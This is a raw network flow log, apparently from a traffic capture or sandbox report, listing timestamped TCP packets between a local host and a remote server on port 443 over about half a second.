Oct 30, 2024 19:47:18.220158100 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.220195055 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.220201015 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.220232010 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.220241070 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.220834970 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.220860004 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.220916033 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.220922947 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.220953941 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.220968962 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.221288919 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.221308947 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.221354961 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.221362114 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.221386909 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.221411943 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.222212076 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.222234011 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.222285986 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.222291946 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.222305059 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.222331047 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.223143101 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.223161936 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.223197937 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.223203897 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.223216057 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.223229885 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.223242044 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.223248959 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.223258018 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.223275900 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.223308086 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.224117041 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.224134922 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.224210024 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.224217892 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.224261045 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.224806070 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.224823952 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.224853039 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.224859953 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.224885941 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.224903107 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.263128042 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.263150930 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.263222933 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.263231993 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.263272047 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.301103115 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.301125050 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.301202059 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.301213980 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.301255941 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.343624115 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.343648911 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.343694925 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.343703985 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.343719959 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.343755007 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.360138893 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.360161066 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.360208035 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.360217094 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.360245943 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.360264063 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.386090040 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.386112928 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.386167049 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.386174917 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.386209965 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.386229038 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.403325081 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.403346062 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.403517962 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.403527021 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.403565884 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.420161009 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.420181990 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.420222998 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.420231104 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.420248032 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.420268059 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.436347961 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.436372995 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.436408997 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.436417103 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.436443090 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.436460972 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.441921949 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.441942930 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.441975117 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.441982985 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.441992998 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.442018986 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.442222118 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.442248106 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.442277908 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.442284107 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.442300081 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.442323923 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.442749977 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.442770004 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.442814112 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.442825079 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.442850113 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.442859888 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.443592072 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.443613052 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.443654060 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.443660975 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.443685055 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.443703890 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.444513083 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.444531918 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.444575071 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.444583893 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.444631100 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.445358992 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.445377111 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.445420980 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.445426941 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.445437908 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.445441008 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.445461988 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.445472002 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.445485115 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.445485115 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.445519924 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.445534945 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.446316004 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.446336031 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.446374893 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.446382046 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.446393013 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.446418047 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.447053909 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.447072983 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.447105885 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.447112083 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.447139025 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.447154045 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.461997032 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.462017059 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.462121964 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.462127924 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.462143898 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.462169886 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.462779045 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.462798119 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.462835073 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.462841034 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.462857008 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.462873936 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.463462114 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.463480949 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.463509083 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.463515043 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.463548899 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.463567019 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.464112997 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.464133978 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.464165926 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.464173079 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.464188099 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.464211941 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.465038061 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.465055943 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.465087891 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.465095997 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.465109110 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.465131998 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.465607882 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.465629101 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.465660095 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.465667009 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.465676069 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.465706110 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.466054916 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.466075897 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.466105938 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.466113091 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.466135979 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.466144085 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.466964960 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.466984034 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.467015982 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.467020988 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.467035055 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.467061043 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.467837095 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.467858076 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.467888117 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.467894077 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.467905998 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.467935085 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.468497038 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.468518019 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.468548059 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.468553066 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.468563080 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.468581915 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.468589067 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.468596935 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.468620062 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.468632936 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.468640089 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.468667030 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.468686104 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.469520092 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.469540119 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.469571114 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.469578028 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.469588041 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.469613075 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.470293045 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.470312119 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.470344067 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.470349073 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.470360041 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.470382929 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.505073071 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.505095959 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.505155087 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.505167007 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.505178928 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.505197048 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.548002005 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.548026085 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.548214912 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.548226118 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.548271894 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.585557938 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.585608959 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.585756063 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.585757017 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.585766077 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.585812092 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.586708069 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.586725950 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.586806059 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.586812973 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.586858988 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.587213039 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.587227106 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.587287903 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.587295055 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.587340117 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.587737083 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.587752104 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.587801933 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.587807894 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.587842941 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.588495016 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.588509083 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.588565111 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.588572025 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.588617086 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.589296103 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.589310884 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.589378119 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.589385986 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.589428902 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.590003967 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.590019941 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.590070963 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.590076923 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.590104103 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.590116024 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.590125084 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.590133905 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.590156078 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.590194941 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.590866089 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.590909004 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.590923071 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.590929031 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.590955973 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.590971947 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.591749907 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.591764927 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.591815948 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.591823101 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.591861963 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.592631102 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.592647076 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.592701912 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.592709064 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.592741966 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.592749119 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.592756033 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.592786074 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.592787981 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.592818022 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.592823029 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.592849970 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.592875957 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.593595028 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.593610048 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.593667030 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.593674898 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.593729019 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.593780994 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.593837023 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.594099045 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.594152927 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.628242016 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.628263950 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.628467083 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.628495932 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.628542900 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.629762888 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.629776955 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.629832029 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.629841089 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.629875898 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.708821058 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.708841085 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.708913088 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.708913088 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.708941936 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.709002018 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.709335089 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.709350109 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.709393024 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.709403992 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.709425926 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.709454060 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.709882975 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.709897041 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.709950924 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.709958076 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.710000038 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.710382938 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.710397959 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.710448027 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.710453987 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.710464001 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.710490942 CET	49731	443	192.168.2.4	87.106.236.48
